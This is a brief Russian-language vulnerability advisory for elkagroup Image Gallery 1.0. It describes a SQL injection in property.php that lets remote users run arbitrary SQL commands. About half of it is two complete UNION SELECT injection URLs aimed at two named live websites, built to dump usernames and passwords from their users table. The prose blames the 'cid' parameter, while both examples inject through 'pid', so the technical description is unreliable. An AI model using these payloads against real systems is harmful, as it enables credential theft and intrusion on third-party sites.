Программа: elkagroup Image Gallery 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cid» сценарием property.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://www.abfa-esfahan.com/gallery/property.php?cid=9& uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7, concat(username,0x3A,userpassword),9,10,11,12, 13,14,15,16,17%20from%20users
http://www.qanat.info/en/gallery/property.php?cid=0&uid=0 &pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7, concat(username,0x3A,userpassword),9,10,11,12,13,14, 15,16%20from%20users%20%20where%20username %20not%20in%20(0x71616E6174696E)
